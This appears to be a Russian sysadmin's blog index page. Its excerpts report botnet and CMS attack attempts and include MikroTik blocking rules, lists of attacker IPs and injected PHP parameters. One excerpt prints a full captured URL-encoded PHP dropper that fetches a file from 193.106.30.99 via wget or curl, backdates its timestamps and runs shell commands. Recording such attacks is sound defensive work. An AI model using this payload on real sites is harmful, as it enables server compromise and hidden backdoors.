sudo systemctl set-default multi-user.target

Ботнет 92.63.194.0/24 GRE

Имея внешние ip адреса логах микротика периодически кто-то ломится. То в winbox, но он закрыт из вне, то в VPN. Сейчас капитально присосался какой-то ботнет с подсети 92.63.194.0/24

Что он делает?

Ломится подбирая нелепые логины, ну и ладно бы, но залипли установленные соединения и удалить их нельзя -они восстанавливаются.

Вот зараза !
92.63.194.155
92.63.194.158
92.63.194.156
92.63.194.40
92.63.194.91
92.63.194.35
92.63.194.69
92.63.194.41
92.63.194.155
92.63.194.93
92.63.194.92
92.63.194.159
92.63.194.157

Что делать?

Сперва добавлять нижеприведённые правила и шиться последней прошивкой.

/ip firewall raw
add action=drop chain=prerouting src-address-list=Botlist
/ip firewall address-list
add address=92.63.194.0/24 list=Botlist

Теперь осталось только ждать новых и добавлять их в Botlist

А вот список файлов в которые пытаюся впихнуть гадкий код с помощью POST запросов

417.509.php
accept.client.php
accept.json.php
accepted.sess.php
accepted.tools.php
assets
bad.except.php
body.work.php
code.sessions.php
conflicts.link.php
content.img.php
cookie.media.php
data.using.php
database.class.php
database.http.php
exception.config.php
exceptions.throw.php
exceptions.work.php
fail.lib.php
Читать дальше

А вот ip адреса прокси серверов которые используются для атак на движки сайтов

Порты конечно же не указываю так как я не распространитель инфы об актуальных прокси листах, а просто собрал атаки с этих адресов
Список прокси
1.10.207.236
1.2.188.5
1.20.227.241
101.108.96.117
101.109.102.58
101.50.1.2
Читать дальше

Уроды которые ломают движки сайтов краткий список ip адресов

100.101.32.64
100.102.57.0
100.106.68.64
100.108.113.64
100.118.156.0
100.123.159.128
100.125.196.64
Читать дальше

Выкладываю список IP адресов говнюков которые ломятся в дешманские уязвимости движков Livestreet, Drupal, joomla, и т.п.
Значит суть заключается в инъекции эксплоита в определённый файл уязвимого сайта и дальше гады делают что хотят. Но неее…
В следующей статье выложу IP адреса уродов ломающих движки сайтов и их прокси IP адреса.

Вобщем список комманд которые пытаются впихнуть.

'accept' => 'die(pi()*42);',
'catch' => 'assert',
'catch' => 'die(pi()*42);',
'ch' => '1',
'ddd' => '',
'except' => 'assert',
'except' => 'die(pi()*42);',
'internal' => 'assert',
'internal' => 'die(pi()*42);',
'lock' => 'assert',
'lock' => 'die(pi()*42);',
'm' => '[email protected]:0:1',
Читать дальше

Ну очередной эксплоит пытаются засодить уроды с айпи 193.106.30.99

ВОт код

eval(rawurldecode("%20%20%20error_reporting%28E_ALL%29%3B%20%24p%20%3D%20%22DOCUMENT_ROOT%40%7B%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%7D%22%3B%20%24url%20%3D%20%27http%3A//193.106.30.99/tmp/1572027015TQK.txt%27%3B%20%24root%20%3D%20FALSE%3B%20if%20%28strpos%28%24p%2C%20%27DOCUMENT_ROOT%40%27%29%20%21%3D%3D%20FALSE%29%20%7B%20%20%20%20%20%24root%20%3D%20TRUE%3B%20%20%20%20%20%24p%20%3D%20substr%28%24p%2C%2014%29%3B%20%7D%20%24f%20%3D%20%27storage.data.php%27%3B%20%24t%20%3D%20%22%24p/%24f%22%3B%20%24dr%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20%20%24t_rel%20%3D%20str_replace%28%24dr%2C%20%27%27%2C%20%24t%29%3B%20%20if%20%28%21file_exists%28%24t%29%29%20%7B%20%20%20%20%20run%28%22wget%20-O%20%24t%20%24url%22%29%3B%20%20%20%20%20if%20%28%21file_exists%28%24t%29%29%20%7B%20%20%20%20%20%20%20%20%20run%28%22curl%20-o%20%24t%20%24url%22%29%3B%20%20%20%20%20%7D%20%7D%20if%20%28file_exists%28%24t%29%29%20%7B%20%20%20%20%20%24ptime%20%3D%20%40filemtime%28%24p%29%3B%20%20%20%20%20%24ftime%20%3D%20%40get_rand_filetime%28%24p%2C%20%24f%29%3B%20%20%20%20%20if%20%28%24ftime%29%20%7B%20%20%20%20%20%20%20%20%20%40touch%28%24t%2C%20%24ftime%29%3B%20%20%20%20%20%7D%20%20%20%20%20%20if%20%28%24ptime%29%20%7B%20%20%20%20%20%20%20%20%20%40touch%28%24p%2C%20%24ptime%29%3B%20%20%20%20%20%7D%20%20%20%20%20%24cpu%20%3D%20request_url%28%29%3B%20%20%20%20%20die%28%22%3Curl%3E%7B%24cpu%7D%7B%24t_rel%7D%3C/url%3E%22%29%3B%20%7D%20die%28%27_save_failed_%27%29%3B%20%20function%20request_url%28%29%20%7B%20%20%20%20%20%24result%20%3D%20%27%27%3B%20%20%20%20%20%24default_port%20%3D%2080%3B%20%20%20%20%20if%20%28isset%28%24_SERVER%5B%27HTTPS%27%5D%29%20%26%26%20%28%24_SERVER%5B%27HTTPS%27%5D%20%3D%3D%20%27on%27%29%29%20%7B%20%20%20%20%20%20%20%20%20%24result%20.%3D%20%27https%3A//%27%3B%20%20%20%20%20%20%20%20%20%24default_port%20%3D%20443%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24result%20.%3D%20%27http%3A//%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24result%20.%3D%20%24_SERVER%5B%27SERVER_NAME%27%5D%3B%20%20%20%20%20if%20%28%24_SERVER%5B%27SERVER_PORT%27%5D%20%21%3D%20%24default_port%29%20%7B%20%20%20%20%20%20%20%20%20%24result%20.%3D%20%27%3A%27%20.%20%24_SERVER%5B%27SERVER_PORT%27%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20%24result%3B%20%7D%20%20function%20get_rand_filetime%28%24dir%2C%20%24sn%29%20%7B%20%20%20%20%20%20%24f%20%3D%20scandir%28%24dir%29%3B%20%20%20%20%20%24regexp_ary%20%3D%20array%28%27/%5C.%28php%7Chtml%7Cjs%29/%27%2C%20%27/%5C.%28js%7Cgif%7Cjpg%7Cjpeg%7Cpng%29/%27%2C%20%27/.%2A/%27%29%3B%20%20%20%20%20foreach%20%28%24regexp_ary%20as%20%24regexp%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28%24f%20as%20%24file%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%3D%3D%20%27.%27%20OR%20%24file%20%3D%3D%20%27..%27%20OR%20%24file%20%3D%3D%20%24sn%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%24regexp%2C%20%24file%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24time%20%3D%20%40filemtime%28%22%24dir/%24file%22%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24time%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%20%24time%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28%24time%20%3D%20filectime%28%24dir%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24time%3B%20%20%20%20%20%7D%20%20%20%20%20return%20False%3B%20%7D%20%20%20function%20run%28%24in%29%20%7B%20%20%20%20%20%24out%20%3D%20%27%27%3B%20%20%20%20%20if%20%28function_exists%28%27exec%27%29%29%20%7B%20%20%20%20%20%20%20%20%20%40exec%28%24in%2C%20%24out%29%3B%20%20%20%20%20%20%20%20%20%24out%20%3D%20%40join%28%22%5Cn%22%2C%20%24out%29%3B%20%20%20%20%20%7D%20elseif%20%28function_exists%28%27passthru%27%29%29%20%7B%20%20%20%20%20%20%20%20%20ob_start%28%29%3B%20%20%20%20%20%20%20%20%20%40passthru%28%24in%29%3B%20%20%20%20%20%20%20%20%20%24out%20%3D%20ob_get_clean%28%29%3B%20%20%20%20%20%7D%20elseif%20%28function_exists%28%27system%27%29%29%20%7B%20%20%20%20%20%20%20%20%20ob_start%28%29%3B%20%20%20%20%20%20%20%20%20%40system%28%24in%29%3B%20%20%20%20%20%20%20%20%20%24out%20%3D%20ob_get_clean%28%29%3B%20%20%20%20%20%7D%20elseif%20%28function_exists%28%27shell_exec%27%29%29%20%7B%20%20%20%20%20%20%20%20%20%24out%20%3D%20shell_exec%28%24in%29%3B%20%20%20%20%20%7D%20elseif%20%28is_resource%28%24f%20%3D%20%40popen%28%24in%2C%20%22r%22%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%24out%20%3D%20%22%22%3B%20%20%20%20%20%20%20%20%20while%20%28%21%40feof%28%24f%29%29%20%20%20%20%20%20%20%20%20%20%20%20%20%24out%20.%3D%20fread%28%24f%2C%201024%29%3B%20%20%20%20%20%20%20%20%20pclose%28%24f%29%3B%20%20%20%20%20%7D%20%20%20%20%20return%20%24out%3B%20%7D%20"));'

РАСШИФРУЕМ и
Читать дальше

Недавно в почтовике мэйлру обновили дизайн почты.
А что это значит, сбоку появилась дурацкая навязчивая реклама которую невозможно убрать.
Удаляю эту гадость с помощью вот этой статьи radio.obninskiy.net/blog/web-scripts/1533.html
и больше вы эту гадость неувидите

Потребовалось нанести на JPG и PNG файлы ватермарки.
Массовый поиск и нанесение с помощью комманды

ls -1 *.jpg | xargs -I'{}' convert {}  -fill white -box '#00770080' -gravity South -pointsize 20 -annotate +0+5 'radio.obninskiy.net' {}

ls -1 *.png | xargs -I'{}' convert {}  -fill white -box '#00770080' -gravity South -pointsize 20 -annotate +0+5 'radio.obninskiy.net' {}

а также можно поиск и замена по всем папкам

cd /вашш путь
find -name "*.jpg" -print0 | xargs ну и так далее

Как-то раз не глядя купил wifi Ip камеру с али.
Сразу скажу с куполом из оргстекла, под ними же диоды подсветки и объектив это ужастная совмесочка(мыло на картинке а ночью засветы).
Когда пришла камера сразу начал настраивать и столкнулся с отвратительным приложением YOOSEE.
Почему YOOSEE? А почему бы не настроить через CMS на пк или WEB интерфейс? Да потому что нет у неё веб интерфейса — ПОЛНОЕ Г0МН0.
Читать дальше